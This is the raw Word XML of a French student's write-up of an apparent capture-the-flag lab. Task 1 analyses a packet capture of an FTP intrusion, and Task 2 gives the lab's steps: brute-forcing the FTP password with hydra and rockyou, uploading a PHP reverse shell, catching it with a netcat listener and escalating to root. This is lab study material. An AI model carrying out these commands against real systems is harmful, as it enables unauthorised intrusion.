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615A" w14:textId="508C3FB5" w:rsidR="00976D73" w:rsidRDefault="00976D73">
      <w:r>
        <w:t xml:space="preserve">Task 1 : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2818BE0F" w14:textId="54DBF96D" w:rsidR="00976D73" w:rsidRDefault="00976D73">
      <w:r>
        <w:t>2 / Service Utilisé : FTP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2242FCA9" w14:textId="78418DD4" w:rsidR="00976D73" w:rsidRDefault="00976D73">
      <w:r w:rsidRPr="00976D73">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5E723340" wp14:editId="7F32C9A6">
            <wp:extent cx="5760720" cy="1231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EA84" w14:textId="77777777" w:rsidR="00976D73" w:rsidRDefault="00976D73"/>
    <w:p w14:paraId="6CC06E74" w14:textId="3BEF2E60" w:rsidR="00976D73" w:rsidRDefault="00976D73">
      <w:r>
        <w:t xml:space="preserve">3 / Hydra, réponse trouvée </w:t>
      </w:r>
      <w:r w:rsidR="002A1CBE">
        <w:t>à</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> l’aide de l’indice </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2472108B" w14:textId="46F157BF" w:rsidR="00976D73" w:rsidRDefault="00976D73"/>
    <w:p w14:paraId="33C01D85" w14:textId="308658FB" w:rsidR="00976D73" w:rsidRDefault="00976D73">
      <w:r>
        <w:t xml:space="preserve">4 / </w:t>
      </w:r>
      <w:r w:rsidR="002A1CBE">
        <w:t>Il se log avec l’utilisateur Jenny </w:t>
      </w:r>
      <w:r w:rsidR="00E23134">
        <w:t xml:space="preserve">(Paquet 128 par exemple) </w:t>
      </w:r>
      <w:r w:rsidR="002A1CBE">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352271BB" w14:textId="61D2E59A" w:rsidR="002A1CBE" w:rsidRDefault="002A1CBE">
      <w:r w:rsidRPr="002A1CBE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53DFBAD0" wp14:editId="4EB14843">
            <wp:extent cx="5760720" cy="281305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F35C9" w14:textId="2A87FFF8" w:rsidR="002A1CBE" w:rsidRDefault="002A1CBE"/>
    <w:p w14:paraId="3E739D91" w14:textId="2B8648BC" w:rsidR="002A1CBE" w:rsidRDefault="002A1CBE">
      <w:r>
        <w:t>5 /</w:t>
      </w:r>
      <w:r w:rsidR="00E23134">
        <w:t xml:space="preserve">Paquet 395 : </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Mot de passe est : password123 : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D56340E" w14:textId="77777777" w:rsidR="002A1CBE" w:rsidRDefault="002A1CBE"/>
    <w:p w14:paraId="50A1EB96" w14:textId="017FC185" w:rsidR="002A1CBE" w:rsidRDefault="002A1CBE">
      <w:r w:rsidRPr="00976D73">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D2FAEAF" wp14:editId="7F14ED5F">
            <wp:extent cx="5760720" cy="2108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A011" w14:textId="77777777" w:rsidR="002A1CBE" w:rsidRDefault="002A1CBE"/>
    <w:p w14:paraId="2A917EF7" w14:textId="5AA9D590" w:rsidR="002A1CBE" w:rsidRPr="002A1CBE" w:rsidRDefault="002A1CBE">
      <w:r>
        <w:t>6 / Suivre le flux TCP du Paquet 394 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F763AF5" w14:textId="2CDB9202" w:rsidR="00976D73" w:rsidRDefault="002A1CBE">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00007F"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EDEDFB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La réponse est </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="00007F"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EDEDFB"/>
        </w:rPr>
        <w:t>/var/www/html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7D1896" w14:textId="202525BC" w:rsidR="002A1CBE" w:rsidRDefault="002A1CBE">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00007F"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EDEDFB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C255EDC" w14:textId="58606C12" w:rsidR="002A1CBE" w:rsidRDefault="00E23134">
      <w:r w:rsidRPr="00E23134">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6FD72C59" wp14:editId="2CCD3B15">
            <wp:extent cx="4450466" cy="57155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C768" w14:textId="65D4A497" w:rsidR="00E23134" w:rsidRDefault="00E23134"/>
    <w:p w14:paraId="29BB1D75" w14:textId="4622BA11" w:rsidR="00E23134" w:rsidRDefault="00E23134">
      <w:r>
        <w:t xml:space="preserve">7 / Toujours au même endroit : shell.php </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A84FD9" w14:textId="30669A24" w:rsidR="00E23134" w:rsidRDefault="00E23134">
      <w:r w:rsidRPr="00E23134">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7455BE6C" wp14:editId="18773630">
            <wp:extent cx="2209992" cy="70872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2F12F" w14:textId="01363B46" w:rsidR="00E23134" w:rsidRDefault="00E23134"/>
    <w:p w14:paraId="188C8D1A" w14:textId="5A46EF38" w:rsidR="00E23134" w:rsidRDefault="00E23134">
      <w:r>
        <w:t>8 / Dans Wireshark trouver le Protocol en FTP-DATA et suivre le flux TCP : trouver l’adresse pentestmonkey :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E542962" w14:textId="099C01A1" w:rsidR="00E23134" w:rsidRDefault="00E23134">
      <w:r w:rsidRPr="00E23134">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2E4D895D" wp14:editId="30F38758">
            <wp:extent cx="5760720" cy="1839595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3BFB" w14:textId="2F925498" w:rsidR="00E23134" w:rsidRDefault="00E23134"/>
    <w:p w14:paraId="1BC418EC" w14:textId="4BDCA8F5" w:rsidR="00E23134" w:rsidRDefault="00E23134">
      <w:r>
        <w:t xml:space="preserve">9 / Suivre le flux TCP , la commande est whoami : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4A9CA9" w14:textId="5654D240" w:rsidR="00E23134" w:rsidRDefault="00E23134">
      <w:r w:rsidRPr="00E23134">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E0D76AF" wp14:editId="058EE787">
            <wp:extent cx="3810330" cy="777307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33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C189" w14:textId="484DA735" w:rsidR="00E23134" w:rsidRDefault="00E23134"/>
    <w:p w14:paraId="66148740" w14:textId="7D0D929F" w:rsidR="00E23134" w:rsidRDefault="00E23134">
      <w:r>
        <w:t xml:space="preserve">10 / Le nom de la machine est wir3 , marqué en haut de la même </w:t>
      </w:r>
      <w:r w:rsidR="00662FA1">
        <w:t xml:space="preserve">fenêtre : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBED2F4" w14:textId="0B101823" w:rsidR="00662FA1" w:rsidRDefault="00662FA1">
      <w:r w:rsidRPr="00662FA1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="13E3D090" wp14:editId="25C4D445">
            <wp:extent cx="2636748" cy="556308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6748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428E" w14:textId="305AE073" w:rsidR="00662FA1" w:rsidRDefault="00662FA1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">11 / Même fenêtre, on trouve la réponse toujours dans le même onglet : </w:t>
      </w:r>
      <w:r w:rsidRPr="00662FA1">
        <w:t>python3 -c 'import pty; pty.spawn("/bin/bash")'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797B9D55" w14:textId="059A8905" w:rsidR="00662FA1" w:rsidRDefault="00662FA1">
      <w:r w:rsidRPr="00662FA1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1487287C" wp14:editId="2028E235">
            <wp:extent cx="4061812" cy="5715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1812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2410" w14:textId="5D5905CD" w:rsidR="00976D73" w:rsidRDefault="00976D73"/>
    <w:p w14:paraId="3B4077FE" w14:textId="4B0CC2BB" w:rsidR="00662FA1" w:rsidRDefault="00662FA1">
      <w:r>
        <w:t>12 / la commande est sudo su (Toujours sur le même onglet)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B1D37D" w14:textId="7282C3FD" w:rsidR="00662FA1" w:rsidRDefault="00662FA1">
      <w:r w:rsidRPr="00662FA1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="145E4FE2" wp14:editId="012B3AFE">
            <wp:extent cx="3627434" cy="769687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7434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5B713" w14:textId="7683362C" w:rsidR="00662FA1" w:rsidRDefault="00662FA1"/>
    <w:p w14:paraId="22C21D50" w14:textId="18059A5A" w:rsidR="00662FA1" w:rsidRDefault="00662FA1">
      <w:r>
        <w:t xml:space="preserve">13 / Il a téléchargé Reptile depuis github (réponse toujours sur le même onglet) : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29FF2CE3" w14:textId="392053F3" w:rsidR="00662FA1" w:rsidRDefault="00662FA1">
      <w:r w:rsidRPr="00662FA1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="18A75C26" wp14:editId="6786CAD6">
            <wp:extent cx="4450466" cy="289585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2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173CF" w14:textId="137A4ADE" w:rsidR="00662FA1" w:rsidRDefault="00662FA1"/>
    <w:p w14:paraId="1FBA4D1D" w14:textId="073DF2A7" w:rsidR="00662FA1" w:rsidRDefault="00662FA1">
      <w:r>
        <w:t xml:space="preserve">14 / Je me suis aidé de l’indice ainsi que d’internet pour trouver la réponse : Rootkit </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5533E359" w14:textId="77777777" w:rsidR="00976D73" w:rsidRDefault="00976D73"/>
    <w:p w14:paraId="69DF9F93" w14:textId="77777777" w:rsidR="00976D73" w:rsidRDefault="00976D73"/>
    <w:p w14:paraId="00DEF084" w14:textId="77777777" w:rsidR="00976D73" w:rsidRDefault="00976D73"/>
    <w:p w14:paraId="1C80A27E" w14:textId="77777777" w:rsidR="00976D73" w:rsidRDefault="00976D73"/>
    <w:p w14:paraId="5ED1A09F" w14:textId="77777777" w:rsidR="00976D73" w:rsidRDefault="00976D73"/>
    <w:p w14:paraId="52B9E977" w14:textId="0DE68038" w:rsidR="00DC7085" w:rsidRDefault="00FE67A6">
      <w:r>
        <w:t xml:space="preserve">Task 2 : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E26E7E" w14:textId="13C20167" w:rsidR="00FE67A6" w:rsidRDefault="00FE67A6"/>
    <w:p w14:paraId="14BC775B" w14:textId="42F756E1" w:rsidR="00FE67A6" w:rsidRDefault="00FE67A6" w:rsidP="00FE67A6">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Lancer HYDRA </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA179C0" w14:textId="34954A92" w:rsidR="00FE67A6" w:rsidRDefault="00FE67A6" w:rsidP="00FE67A6">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
      </w:pPr>
      <w:r w:rsidRPr="00FE67A6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A9B3518" wp14:editId="4F50A64B">
            <wp:extent cx="4008467" cy="3955123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8467" cy="395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A9E4D" w14:textId="77777777" w:rsidR="0028360C" w:rsidRDefault="0028360C" w:rsidP="0028360C"/>
    <w:p w14:paraId="1C620F15" w14:textId="63E205DC" w:rsidR="00907E70" w:rsidRDefault="00907E70" w:rsidP="00907E70">
      <w:r>
        <w:t xml:space="preserve">Récupérer le mot de passe avec hydra : </w:t>
      </w:r>
      <w:r w:rsidRPr="00907E70">
        <w:t xml:space="preserve">hydra -l jenny -P /usr/share/wordlists/rockyou.txt </w:t>
      </w:r>
      <w:r>
        <w:t>ftp://10.10.141.178(utilisation de la wordlist rockyou)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74BD5F3E" w14:textId="5472E72A" w:rsidR="00907E70" w:rsidRDefault="00907E70" w:rsidP="00907E70">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">On récupère le mot de passe qui est : </w:t>
      </w:r>
      <w:r w:rsidRPr="00907E70">
        <w:t>987654321</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="571B1770" w14:textId="455F1414" w:rsidR="00907E70" w:rsidRDefault="00907E70" w:rsidP="00907E70"/>
    <w:p w14:paraId="31DFFC92" w14:textId="39A555C3" w:rsidR="00907E70" w:rsidRDefault="00907E70" w:rsidP="00907E70">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">On se connecte en FTP sur la machine avec l’utilisateur jenny et le mdp 987654321 : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D7FB79" w14:textId="4F18B096" w:rsidR="00907E70" w:rsidRDefault="00907E70" w:rsidP="00907E70">
      <w:r w:rsidRPr="00907E70">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="000E4A1F" wp14:editId="3F3E2B87">
            <wp:extent cx="4961050" cy="156223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4A1B" w14:textId="39BB6215" w:rsidR="00907E70" w:rsidRDefault="00277D80" w:rsidP="00907E70">
      <w:r>
        <w:t>Se rendre dans le fichier reverse-shell.php :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64AE9293" w14:textId="6A5D96F6" w:rsidR="00277D80" w:rsidRDefault="00277D80" w:rsidP="00907E70">
      <w:r w:rsidRPr="00277D80">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4176E371" wp14:editId="090044D7">
            <wp:extent cx="5745978" cy="281964"/>
            <wp:effectExtent l="0" t="0" r="7620" b="38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5978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557AD" w14:textId="5B25937B" w:rsidR="00277D80" w:rsidRDefault="00277D80" w:rsidP="00907E70">
      <w:r>
        <w:t>Et modifier l’IP ainsi que le port , puis enregistrer les modifications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B97BE6F" w14:textId="17717F9E" w:rsidR="00277D80" w:rsidRDefault="00277D80" w:rsidP="00907E70"/>
    <w:p w14:paraId="78399B53" w14:textId="0B02A059" w:rsidR="00277D80" w:rsidRDefault="009A67A2" w:rsidP="00277D80">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Se connecter en ftp sur la machine, et upload le shell.php </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F00D12" w14:textId="46ABF6BC" w:rsidR="009A67A2" w:rsidRDefault="009A67A2" w:rsidP="009A67A2">
      <w:r w:rsidRPr="009A67A2">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="734173EB" wp14:editId="3108E792">
            <wp:extent cx="4069433" cy="838273"/>
            <wp:effectExtent l="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9433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5FA4" w14:textId="4852AA22" w:rsidR="009A67A2" w:rsidRDefault="009A67A2" w:rsidP="009A67A2"/>
    <w:p w14:paraId="2655AF19" w14:textId="6D21C56B" w:rsidR="009A67A2" w:rsidRDefault="009A67A2" w:rsidP="009A67A2">
      <w:r>
        <w:t xml:space="preserve">A Partir de là, je me suis aidé d’internet et d’un Walkthrough </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2B2B0F" w14:textId="091FD092" w:rsidR="009A67A2" w:rsidRDefault="009A67A2" w:rsidP="009A67A2"/>
    <w:p w14:paraId="249116BB" w14:textId="77777777" w:rsidR="009A67A2" w:rsidRDefault="009A67A2" w:rsidP="009A67A2"/>
    <w:p w14:paraId="0A12F8DD" w14:textId="25080F6E" w:rsidR="009A67A2" w:rsidRDefault="006B0909" w:rsidP="006B0909">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Exécuter la commande sudo nc -lnvp 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4144BD43" w14:textId="7F7792B3" w:rsidR="006B0909" w:rsidRDefault="006B0909" w:rsidP="006B0909">
      <w:r>
        <w:t xml:space="preserve">Ensuite, aller sur la page web en tapant l’ip dans le navigateur </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2943DE21" w14:textId="5E75806E" w:rsidR="006B0909" w:rsidRDefault="006B0909" w:rsidP="006B0909">
      <w:r w:rsidRPr="006B0909">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="36C40196" wp14:editId="5A7F3DDF">
            <wp:extent cx="5760720" cy="2148205"/>
            <wp:effectExtent l="0" t="0" r="0" b="444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F5CB" w14:textId="33FB90A0" w:rsidR="006B0909" w:rsidRDefault="006B0909" w:rsidP="006B0909"/>
    <w:p w14:paraId="54E808D7" w14:textId="53472EBB" w:rsidR="006B0909" w:rsidRDefault="006B0909" w:rsidP="006B0909">
      <w:r>
        <w:t>Si j’ai bien compris, il faut se rendre sur la page web : @IP/shell.php , on devrait récupérer le reverseshell sur netcat.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD89AA4" w14:textId="4CB17632" w:rsidR="006B0909" w:rsidRDefault="006B0909" w:rsidP="006B0909"/>
    <w:p w14:paraId="4F10364D" w14:textId="3ABA2296" w:rsidR="006B0909" w:rsidRDefault="00B3256D" w:rsidP="006B0909">
      <w:r>
        <w:t xml:space="preserve">Exécuter la commande : </w:t>
      </w:r>
      <w:r w:rsidRPr="00B3256D">
        <w:t>put php-reverse-shell.php</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> sur la session ftp du pc de jenny </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11CDA32C" w14:textId="18F977D3" w:rsidR="00B3256D" w:rsidRDefault="00B3256D" w:rsidP="006B0909"/>
    <w:p w14:paraId="35768CE7" w14:textId="7A8C5595" w:rsidR="00B3256D" w:rsidRDefault="00B3256D" w:rsidP="006B0909">
      <w:r>
        <w:t xml:space="preserve">Puis : </w:t>
      </w:r>
      <w:r w:rsidRPr="00B3256D">
        <w:t>chmod 777 php-reverse-shell.php</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> afin de changer les permissions </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74BC3F25" w14:textId="74CF5EC2" w:rsidR="00B3256D" w:rsidRDefault="00B3256D" w:rsidP="006B0909"/>
    <w:p w14:paraId="52731D1B" w14:textId="77777777" w:rsidR="00B3256D" w:rsidRDefault="00B3256D" w:rsidP="006B0909"/>
    <w:p w14:paraId="79D8AC27" w14:textId="6989977B" w:rsidR="00277D80" w:rsidRDefault="006008B9" w:rsidP="00B3256D">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Exécuter la commande </w:t>
      </w:r>
      <w:r w:rsidRPr="006008B9">
        <w:t>nc -lnvp 1234</w:t>
      </w:r>
      <w:r>
        <w:t>, en rentrant le numéro de port renseigné dans le fichier au préalable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E852E9C" w14:textId="784D7757" w:rsidR="006008B9" w:rsidRDefault="006008B9" w:rsidP="006008B9">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A85F514" w14:textId="4D145B1F" w:rsidR="006008B9" w:rsidRDefault="006008B9" w:rsidP="006008B9">
      <w:r>
        <w:t xml:space="preserve">Aller sur la page web : </w:t>
      </w:r>
      <w:hyperlink r:id="rId21" w:history="1">
        <w:r w:rsidRPr="00E1412A">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
          </w:rPr>
          <w:t>http://</w:t>
        </w:r>
        <w:r w:rsidRPr="00E1412A">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
          </w:rPr>
          <w:t>@IP</w:t>
        </w:r>
        <w:r w:rsidRPr="00E1412A">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
          </w:rPr>
          <w:t>/php-reverse-shell.php</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="20F880EA" w14:textId="787663E0" w:rsidR="006008B9" w:rsidRDefault="006008B9" w:rsidP="006008B9"/>
    <w:p w14:paraId="70E28487" w14:textId="522C6880" w:rsidR="006008B9" w:rsidRDefault="006008B9" w:rsidP="006008B9">
      <w:r>
        <w:t>Retourner sur le netcat voir si on a un reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB1E745" w14:textId="200203B5" w:rsidR="006008B9" w:rsidRDefault="006008B9" w:rsidP="006008B9"/>
    <w:p w14:paraId="0854EEBB" w14:textId="1D7E2617" w:rsidR="006008B9" w:rsidRDefault="006008B9" w:rsidP="006008B9">
      <w:r>
        <w:t xml:space="preserve">Exécuter la commande : </w:t>
      </w:r>
      <w:r w:rsidRPr="006008B9">
        <w:t>python3 -c 'import pty;pty.spawn("/bin/bash")'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8805AB" w14:textId="75EAA6CA" w:rsidR="006008B9" w:rsidRDefault="006008B9" w:rsidP="006008B9">
      <w:r>
        <w:t>(Je n’ai pas très bien compris à quoi servait cette commande)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="290BD4CB" w14:textId="45EF302F" w:rsidR="006008B9" w:rsidRDefault="006008B9" w:rsidP="006008B9"/>
    <w:p w14:paraId="04185D02" w14:textId="77777777" w:rsidR="006008B9" w:rsidRPr="00907E70" w:rsidRDefault="006008B9" w:rsidP="006008B9"/>
    <w:p w14:paraId="3B240A50" w14:textId="3A7F1C31" w:rsidR="00FE67A6" w:rsidRDefault="006008B9" w:rsidP="00FE67A6">
      <w:r>
        <w:t>On sait que l’utilisateur Jenny a les droit SuperUser , donc on se connecte en faisant : su jenny</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39695DB7" w14:textId="0D6FF119" w:rsidR="006008B9" w:rsidRDefault="006008B9" w:rsidP="00FE67A6">
      <w:r>
        <w:t>Toujours le même mot de passe : 987654321</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8114D8" w14:textId="650954E5" w:rsidR="003D026C" w:rsidRDefault="003D026C" w:rsidP="00FE67A6"/>
    <w:p w14:paraId="320AB866" w14:textId="0C0D4F54" w:rsidR="003D026C" w:rsidRDefault="003D026C" w:rsidP="00FE67A6">
      <w:r>
        <w:t xml:space="preserve">Il faut trouver le directory Reptile , car on sait que le fichier flag.txt s’y trouve : </w:t>
      </w:r>
      <w:r w:rsidRPr="003D026C">
        <w:t>find / -type d -name Reptile 2&gt; /dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A91231" w14:textId="722BE958" w:rsidR="003D026C" w:rsidRDefault="003D026C" w:rsidP="00FE67A6"/>
    <w:p w14:paraId="19A3C570" w14:textId="4191C1FB" w:rsidR="003D026C" w:rsidRDefault="003D026C" w:rsidP="00FE67A6">
      <w:r>
        <w:t xml:space="preserve">On devrait avoir le résultat suivant : </w:t>
      </w:r>
      <w:r w:rsidRPr="003D026C">
        <w:t>/root/Reptile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FCB7FCC" w14:textId="0CF25EC6" w:rsidR="003D026C" w:rsidRDefault="003D026C" w:rsidP="00FE67A6"/>
    <w:p w14:paraId="492A851B" w14:textId="4E48F51D" w:rsidR="003D026C" w:rsidRDefault="003D026C" w:rsidP="00FE67A6">
      <w:r>
        <w:t>Aller donc dans le flag.txt : cat flag.txt afin d’y trouver la dernière réponse de la TASK 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDBB5E7" w14:textId="06DE079C" w:rsidR="003D026C" w:rsidRDefault="003D026C" w:rsidP="00FE67A6"/>
    <w:p w14:paraId="0ED69C7E" w14:textId="77777777" w:rsidR="003D026C" w:rsidRDefault="003D026C" w:rsidP="00FE67A6"/>
    <w:p w14:paraId="490E679D" w14:textId="48A9BC10" w:rsidR="006008B9" w:rsidRDefault="006008B9" w:rsidP="00FE67A6"/>
    <w:p w14:paraId="32A09D56" w14:textId="77777777" w:rsidR="006008B9" w:rsidRDefault="006008B9" w:rsidP="00FE67A6"/>
    <w:sectPr w:rsidR="0060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25CBE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F34C46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A6"/>
    <w:rsid w:val="00277D80"/>
    <w:rsid w:val="0028360C"/>
    <w:rsid w:val="002A1CBE"/>
    <w:rsid w:val="003D026C"/>
    <w:rsid w:val="006008B9"/>
    <w:rsid w:val="00662FA1"/>
    <w:rsid w:val="006B0909"/>
    <w:rsid w:val="00907E70"/>
    <w:rsid w:val="00976D73"/>
    <w:rsid w:val="009A67A2"/>
    <w:rsid w:val="00B3256D"/>
    <w:rsid w:val="00DC7085"/>
    <w:rsid w:val="00E23134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71F8"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{457FE16C-8E2A-4C29-A52F-33CD01B4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7A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07E70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07E70"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi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07E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@IP/php-reverse-shell.php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BEGUE</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Hugo</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-02-25T10:59:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-02-28T10:43:00Z</dcterms:modified>
</cp:coreProperties>
</file>